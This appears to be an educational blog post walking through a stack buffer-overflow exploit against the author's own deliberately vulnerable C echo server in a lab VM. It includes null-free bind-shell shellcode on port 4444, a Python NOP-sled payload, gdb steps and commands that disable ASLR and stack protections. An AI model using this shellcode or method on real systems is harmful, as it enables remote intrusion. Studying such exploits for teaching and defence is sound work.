The Classic Stack-Based Buffer-Overflow Attack

I’ve had the pleasure of talking to several folks who are involved in cybersecurity in one form or another. It’s surprising to me how few of us have actually gone through the trouble of crafting an exploit by hand. I think that the process of identifying a vulnerability and exploiting it by hand leads to a deep understanding of the subject and the challenges we face as cybersecurity professionals.

There are many kinds of vulnerabilities and many kinds of exploits. Today I’ll be talking about a classic memory corruption attack: the stack buffer-overflow. It’s been around for a long time. Elias Levy, aka ‘Aleph One’, wrote about it in a 1996 ‘Phrack’ magazine article titled “Smashing The Stack For Fun and Profit”. It’s worth a read and it’s a part of our history.

The stack buffer-overflow is a great place to start because the both vulnerability itself and method of exploitation are fairly straight forward. Perhaps if there is enough interest, I’ll write some future blog posts about other kinds of vulnerabilities and their exploits.

Lets start with a simple program that has an exploitable bug. (adapted from this code)

// echo.c
// compile with these flags to disable modern stack smashing protection:
// gcc -g -fno-stack-protector -z execstack -pthread echo.c -o echo

#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <resolv.h>
#include <arpa/inet.h>
#include <pthread.h>

#define PANIC(msg)  { perror(msg); exit(-1); }

void* echo_handler(void* client_fd)
{   char line[0100];
    int bytes_read;
    int client = *(int *)client_fd;

    bytes_read = recv(client, line, 1000, 0);
    send(client, line, bytes_read, 0);
    close(client);

    return client_fd;
}

int main(void)
{
    int sd;
    struct sockaddr_in addr;

    if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) < 0 ) PANIC("Socket");

    addr.sin_family = AF_INET;
    addr.sin_port = htons(9999);
    addr.sin_addr.s_addr = INADDR_ANY;

    if ( bind(sd, (struct sockaddr*)&addr, sizeof(addr)) != 0 ) PANIC("Bind");
    if ( listen(sd, 20) != 0 ) PANIC("Listen");

    while (1)
    {
        int client, addr_size = sizeof(addr);
        pthread_t child;

        client = accept(sd, (struct sockaddr *) &addr, (socklen_t *) &addr_size);
        printf("Connected: %s:%d\n", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port));
        if ( pthread_create(&child, NULL, echo_handler, &client) != 0 )
            perror("Thread creation");
        else
            pthread_detach(child);  /* disassociate from parent */
    }

    return 0;
}

This program runs a network service on port 9999 that listens for incoming connections and will receive (up to 1000 bytes) data and echos it back to the connected client. It then closes the connection. It is multithreaded and can handle multiple simultaneous connections.

There are two lines of code that are of particular interest in the echo_handler function:

char line[0100];

and

bytes_read = recv(client, line, 1000, 0);

In the first line we see that the variable line is a char array allocated on the stack with 0100 slots. Based on the second line, this is probably a typo—the programmer almost certainly meant to type 1000 but accidentally wrote 0100. Unfortunately for the programmer, this is a valid expression. 0100 is interpreted by the parser as a base 8 number and has the base 10 value 64. Oops!

Since the variable line is passed to recv as the buffer argument with a corresponding length argument of 1000, if the client sends more than 64 bytes of data, the line buffer will overflow.

Lets take a moment and review how function calls work—Specifically, what happens to the stack when a function call is made.

The following is a great image depicting a stack frame along with some associated code on the x86_64 architecture that I found here. It’s a good post. If you are interested in frame layouts and calling conventions on x86_64 its a worth a read.

long myfunc(long a, long b, long c, long d,
            long e, long f, long g, long h)
{
    long xx = a * b * c * d * e * f * g * h;
    long yy = a + b + c + d + e + f + g + h;
    long zz = utilfunc(xx, yy, xx % yy);
    return zz + 20;
}

The graphic shows the calling convention for x86_64. We see that the first six arguments are passed in registers and if a function accepts more than six, they are passed on the stack. They are accessible to the callee function by indexing off of %rbp. This is very similar to x86 other than passing parameters in registers. (Don’t worry too much about the ‘red zone’, it’s not really relevant to our discussion.)

We see that when the stack frame is set up, the return address is sitting just above the base pointer (%rbp). This is the key to our exploit. The fact that control flow information is co-located with program data gives us the opportunity to exert our influence on the control flow of the program in arbitrary and spectacular ways.

(Note: depending on the compiler, OS, language, and compiler flags, there may be some other stuff in between the local variables and the return address.)

Lets take a look at the disassembly of echo_handler:


0000000000400a26 <echo_handler>:
  400a26:   55                      push   %rbp
  400a27:   48 89 e5                mov    %rsp,%rbp
  400a2a:   48 83 ec 60             sub    $0x60,%rsp
             ...
            <snip>
             ...
  400a93:   c9                      leaveq
  400a94:   c3                      retq

When a function is called, a few things happen to setup and tear down the stack frame for that function. First, the base pointer is saved on the stack (push %rbp), the base pointer is set to the old stack pointer (mov %rsp,%rbp), and finally, the stack pointer is decremented to make room for the frame (sub $0x60,%rsp)—remember, the stack grows down, the heap grows up.

At the end of the call, the last two instructions are undoing the stuff that was done at the beginning (leaveq, and retq). Collectively, they restore the stack to the state it was in when the caller called the callee and the program then continues execution on the next line of the caller function. Specifically, retq takes the value that is stored at the location labeled ‘return address’ in the graphic and puts it into %rip and the program continues execution wherever %rip is pointing to. If we can overwrite that value, we control the execution of the program!

This opens up a bunch of possibilities. The only one I’m going to cover today is code injection. Since we have 1000 bytes to work with in the line buffer, we can write our own program and have the echo server execute it for us. We could do all sorts of things, but the most fun thing to do is spawn a shell that we can connect to over the network.

Unfortunately, we need to write a program that the machine knows how to execute. Sadly, the machine only speaks one language—machine code. Fortunately, we can write code in a higher level language (haha–yes, by that I mean assembly) and use the compiler to translate our code into machine code. Then we can extract the op-codes and push them into the buffer.

Before writing the assembly program, lets first write out what we want in C:

// dup2-shellcode.c
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

void main(void)
{
    int sockfd, newsockfd, portno, pid;
    struct sockaddr_in serv_addr;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    portno = 4444;
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(portno);

    bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr));

    listen(sockfd, 5);

    while(1)
    {
        newsockfd = accept(sockfd, 0, 0);

        if( (pid = fork()) == 0 )
        {
            dup2(newsockfd, 0); // bind stdin
            dup2(newsockfd, 1); // bind stdout
            dup2(newsockfd, 2); // bind stderr

            execve("/bin/sh", 0, 0);
        }
    }
}

I’m setting up a server that listens on port 4444. When a client connects, the program accepts the connection and forks. If it’s the child, it goes on to call dup2 for stdin, stdout and stderr to close those files and reset them to the accepted socket’s file descriptor. Then the child process runs execve and becomes /bin/sh. Now the client has a remote shell to interact with.

To get an idea of what the assembly will need to look like, we can get the compiler to generate some assembly by doing:

$ gcc -fpic -S dup2-shellcode.c

and then look at dup2-shellcode.s. Instead of showing that here, I’ll jump ahead to my x86_64 rewrite of the C code above. The biggest difference between it and the C code is that it doesn’t make any function calls. Instead, it relies exclusively on system calls. I should point out that the calling convention for syscalls is slightly different than for function calls in x86_64, but for the syscalls I’ll be making, they are equivalent.

Also, I’ve gone through the trouble to make sure the code doesn’t generate any Null bytes. This is important in shellcode as the attack vector is often the misuse of string functions. It’s heavily commented so it will hopefully be somewhat understandable:

# asm.s

    xor    %eax, %eax       # start off with %eax = 0

    # socket call           # socket(AF_INET, SOCK_STREAM, 0)
    mov    $0x1, %al        #
    mov    %eax, %esi       # SOCK_STREAM == 1
    inc    %al              #
    mov    %eax, %edi       # AF_INET == 2
    xor    %rdx, %rdx       # (arg 3 = 0)
    mov    $0x29, %al       # set the syscall number
    syscall

    # bind(int socket, const struct sockaddr *address, socklen_t address_len)
    xchg   %eax, %ebx       # store the socket FD in %ebx
    xor    %rax, %rax       # zero out %rax
    push   %rax             # push it so we can use it later
    pushq  $0x5c110102      # set sin_port = 4444 == 0x5c11
                            # and sin_family = AF_INET == 0x0002
                            # we actually want 0x5c110002 but that has a
                            # null byte which we set in the next instruction

    mov    %al, 0x1(%rsp)   # here we set that null byte

    mov    %rsp, %rsi       # load our carefully constructed value into %rsi
                            # (arg 2 for bind)
    mov    $0x10, %dl       # (arg 3 for bind)
    mov    %ebx, %edi       # put the FD we got from socket() into %rdi
                            # (arg 1 for bind)
    mov    $0x31, %al       # set the syscall number
    syscall

    # listen call           # listen(int socket, int backlog)
    mov    $0x5, %al        #
    mov    %eax, %esi       # the second arg to listen (5 in this case)
    mov    %ebx, %edi       # the socket FD (arg 1 of listen)
    mov    $0x32, %al       # set the syscall number
    syscall

# we call accept in what is effectively a while true loop
# accept(socket, restrict address, address_len)
accept:
# we call accept(socket_fd, 0, 0). It works fine to pass 0 for arg 2 and 3.
    xor    %edx, %edx       # (0 -- arg 3 for accept)
    xor    %esi, %esi       # (0 -- arg 2 for accept)
    mov    %ebx, %edi       # the socket FD (arg 1 for accept)
    mov    $0x2b, %al       # setup the syscall number
    syscall

    mov    %eax, %ebp       # store the FD from accept

    # fork
    mov   $0x39, %al        # setup the syscall number
    syscall

    # go back to accept if we are the parent
    or    %eax, %eax
    jnz    accept

    # else we dup2 stdin, stdout, stderr

    # The following is equivalent to:
    # newsockfd = %ebp
    # dup2(newsockfd, 0); // bind stdin
    # dup2(newsockfd, 1); // bind stdout
    # dup2(newsockfd, 2); // bind stderr

    mov    %ebp, %edi       # the fd to dup to (arg 1)
    xor    %rax, %rax       # start with fd 0 (stdin)
    mov    %eax, %esi       # put it into %esi (arg 2)
    mov    $0x21, %al       # setup the syscall number
    syscall  # dup2 stdin

    inc    %al              # %al is zero (from the syscall return)
                            # so we increment
    mov    %eax, %esi       # to make it 1 (stdout) and do it all again
    mov    $0x21, %al
    syscall  # dup2 stdout

    inc    %al              # one more time for stderr.
    mov    %eax, %esi
    mov    $0x21, %al
    syscall  # dup2 stderr

    # below we are basically doing:
    # cmd = "/bin/sh";
    # args = {cmd, 0};
    # execve(cmd, args, 0)
    xor    %rdx, %rdx       # 0 is the third arg to execve
    # store the string '/bin/sh' into %rbx
    movabs $0x68732f6e69622fff, %rbx
    shr    $0x8, %rbx       # add a null byte to terminate the string
    push   %rbx             # put it on the stack
    mov    %rsp, %rdi       # load a pointer to the string into %rdi
                            # (arg 1 of execve)
    xor    %rax, %rax       # make a null
    push   %rax             # put it on the stack
    push   %rdi             # push the pointer to the string
    mov    %rsp, %rsi       # put the args pointer into %rsi (arg 2)
    mov    $0x3b, %al
    syscall

To convert this into opcodes, we again use the compiler:

$ gcc -c asm.s

then we do:

$ objdump -d asm.o > asm.dump.s

which give us:

asm.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <accept-0x34>:
   0:   31 c0                   xor    %eax,%eax
   2:   b0 01                   mov    $0x1,%al
   4:   89 c6                   mov    %eax,%esi
   6:   fe c0                   inc    %al
   8:   89 c7                   mov    %eax,%edi
   a:   48 31 d2                xor    %rdx,%rdx
   d:   b0 29                   mov    $0x29,%al
   f:   0f 05                   syscall
  11:   93                      xchg   %eax,%ebx
  12:   48 31 c0                xor    %rax,%rax
  15:   50                      push   %rax
  16:   68 02 01 11 5c          pushq  $0x5c110102
  1b:   88 44 24 01             mov    %al,0x1(%rsp)
  1f:   48 89 e6                mov    %rsp,%rsi
  22:   b2 10                   mov    $0x10,%dl
  24:   89 df                   mov    %ebx,%edi
  26:   b0 31                   mov    $0x31,%al
  28:   0f 05                   syscall
  2a:   b0 05                   mov    $0x5,%al
  2c:   89 c6                   mov    %eax,%esi
  2e:   89 df                   mov    %ebx,%edi
  30:   b0 32                   mov    $0x32,%al
  32:   0f 05                   syscall

0000000000000034 <accept>:
  34:   31 d2                   xor    %edx,%edx
  36:   31 f6                   xor    %esi,%esi
  38:   89 df                   mov    %ebx,%edi
  3a:   b0 2b                   mov    $0x2b,%al
  3c:   0f 05                   syscall
  3e:   89 c5                   mov    %eax,%ebp
  40:   b0 39                   mov    $0x39,%al
  42:   0f 05                   syscall
  44:   09 c0                   or     %eax,%eax
  46:   75 ec                   jne    34 <accept>
  48:   89 ef                   mov    %ebp,%edi
  4a:   48 31 c0                xor    %rax,%rax
  4d:   89 c6                   mov    %eax,%esi
  4f:   b0 21                   mov    $0x21,%al
  51:   0f 05                   syscall
  53:   fe c0                   inc    %al
  55:   89 c6                   mov    %eax,%esi
  57:   b0 21                   mov    $0x21,%al
  59:   0f 05                   syscall
  5b:   fe c0                   inc    %al
  5d:   89 c6                   mov    %eax,%esi
  5f:   b0 21                   mov    $0x21,%al
  61:   0f 05                   syscall
  63:   48 31 d2                xor    %rdx,%rdx
  66:   48 bb ff 2f 62 69 6e    movabs $0x68732f6e69622fff,%rbx
  6d:   2f 73 68
  70:   48 c1 eb 08             shr    $0x8,%rbx
  74:   53                      push   %rbx
  75:   48 89 e7                mov    %rsp,%rdi
  78:   48 31 c0                xor    %rax,%rax
  7b:   50                      push   %rax
  7c:   57                      push   %rdi
  7d:   48 89 e6                mov    %rsp,%rsi
  80:   b0 3b                   mov    $0x3b,%al
  82:   0f 05                   syscall

All of those hex numbers after the colons (:) and before the asm instructions are what we are after.

After collecting all of those op-codes, we can now construct our exploit. I’m a python fan so here is my python exploit implementation:

exploit = ''.join([
    '\x31\xc0\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\x48\x31\xd2\xb0\x29\x0f\x05\x93',
    '\x48\x31\xc0\x50\x68\x02\x01\x11\x5c\x88\x44\x24\x01\x48\x89\xe6\xb2\x10',
    '\x89\xdf\xb0\x31\x0f\x05\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2',
    '\x31\xf6\x89\xdf\xb0\x2b\x0f\x05\x89\xc5\xb0\x39\x0f\x05\x09\xc0\x75\xec',
    '\x89\xef\x48\x31\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21\x0f',
    '\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69',
    '\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48',
    '\x89\xe6\xb0\x3b\x0f\x05',
])

attack_addr = '\xaa\x4f\x81\xf7\xff\x7f\x00\x00'

print '\x90' * 64 + attack_addr * 10 + ('\x90' * 50) + exploit

So what’s going on in there?

The exploit variable is simple. It’s just the opcodes in a string (\xNN will embed the literal hex value NN into the string).

There is a seemingly magic value called attack_addr. This is the address that I want to overwrite the return address with. I’ll come back to this in a second.

Finally, we are printing '\x90' 64 times, followed by ten copies of attack_addr followed by a bunch of '\x90' again–this time 50 times, and then the exploit string.

Why??!

Ok, here’s what happening. First, we are filling the line buffer. It’s 64 bytes long, remember? We could have written 64 bytes of anything at all.

If we keep writing, we will eventually overwrite the return address. Exactly how much space is there between the end of the buffer and the return address? Unfortunately this depends on the compiler and the language. The good news is that it doesn’t matter! We know that the line variable will by word aligned. So will the return address. Since 64 is a multiple of 8 (the word-size in this case), we can just repeat the attack_addr a few times. It’s guaranteed to overwrite the return address correctly.

Next we fill in a bunch of '\x90' bytes. That the op-code for nop. We are constructing what’s called a ‘sled’. The idea is that the instruction pointer can land anywhere in the nop sled and it will harmlessly execute the nop instruction over and over until it reaches our exploit code.

Yay!

Wait, how did I come up with the value for attack_addr?

Ok, it’s time to come clean on a few things. As I said in the beginning, this attack has been around for a long time. Every modern operating system has protections in place to prevent this sort of thing from working. You may have noticed that comment at the beginning of echo.c:

// compile with these flags to disable modern stack smashing protection:
// gcc -g -fno-stack-protector -z execstack -pthread echo.c -o echo

Lets go through the security related flags:

The -fno-stack-protector flag prevents a ‘stack canary’ from being used to detect the return address being changed. Without this flag, out attack would result in the program printing out a ‘stack smashing’ warning and exiting.
The -z execstack disables what’s called ‘W xor X’ protection. That means that by default, memory pages are marked as either writable, or executable, but never both. Without this flag, out exploit would result in a segmentation violation (SIGSEGV)

Furthermore, modern operating systems also use Address Space Layout Randomization (ASLR). This means that every time a process runs, the base address of the stack, and the heap (and perhaps other things depending on the OS and the settings) are set to a random address. This makes determining the desired attack address quite difficult.

So here’s the last dirty trick I’m pulling to make this work. Before running the echo program, I run this command:

setarch x86_64 -R $SHELL

This spawns a shell with ASLR turned off.

Ok, with that said, here’s how to get the attack_addr.

All we do is run the program in the debugger:

$ gdb echo

then on the gdb prompt, we set a breakpoint on line 26 and run the program:

(gdb) b 26
Breakpoint 1 at 0x400a8f: file echo.c, line 26.
(gdb) r
Starting program: /home/developer/echo
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Now it’s waiting for a connection. I’m running all of this on a VM with an IP 192.168.242.131 so I’ll do this to make the connection:

nc 192.168.242.131 9999
hello
hello

I type ‘hello’ and it echo’s it back to me. Back to gdb. We now see:

Breakpoint 1, echo_handler (client_fd=0x7fffffffe798) at echo.c:26
26      return client_fd;

Now we can print the address of line by doing:

(gdb) x/xw line
0x7ffff7814f00: 0x00000a6a

That’s the info we needed. From there we can compute a good attack_addr. I added 64 and the around 100 more to make sure I was inside the nop sled. Remember, we repeat attack_addr 10 times. That’s 80 bytes, so 100 or so is a good guess. If it doesn’t work the first time, a little trial and error goes a long way.

Note that the attack_addr is backwards! This is super important. x86_64 is little endian. If you don’t know what that means, go look it up. It’s worth your time to understand that.

Ok, now we can actually use our exploit:

$ python nc_exploit.py| nc 192.168.242.131 9999

It’s that simple. Now to use the exploit, we connect on port 4444:

nc 192.168.242.131 9999
whoami
developer
pwd
/home/developer

I typed a couple commands to make sure I had a shell. It’s not quite what we are used to a shell looking like. That’s because a psudo-terminal hasn’t been allocated. If it bugs you, you can fix it like this:

python -c 'import pty;pty.spawn("/bin/bash")'
developer@debian:/home/developer$ whoami
whoami
developer
developer@debian:/home/developer$ pwd
pwd
/home/developer
developer@debian:/home/developer$

It still echo’s your command back, but now things look right.

Awesome huh?

Here is something more awesome. This exploit is non-destructive! If we fire up another terminal and connect to the echo server on port 9999 it still works as expected. This is the best case scenario for an exploiter. The victim has no idea that anything is amiss and the vulnerable program just keep on running!

If you work in the cyber world, I highly recommend that you set up a VM and try to reproduce this yourself. Better yet, write your own vulnerable program and assembly exploit!

It’s one thing to listen to a lecture or read about something but it is quit a different matter to get your hands dirty and actually implement something. Especially when it comes to cyber topics.

As I said at the beginning, this exploit is quite old and chances are, your OS already protects you against attacks of this specific form. However, variations on this attack can and do circumvent the protections I’ve talked about in this post. If there is sufficient interest, I could be talked into writing future posts demonstrating other types of exploits including more modern variations of this one.

One last thing. My asm exploit is supposed to continue to serve shells on port 4444. Unfortunately, the accept syscall succeeds the first time, but on subsequent connections it fails. Running in the debugger reveals that errno is set to 9 which means ‘bad file descriptor’. I’m not sure why this is happening. Cudos to the reader who comes up with a fix for the exploit to correct this behavior.

Cheers.

Leave a Reply Cancel reply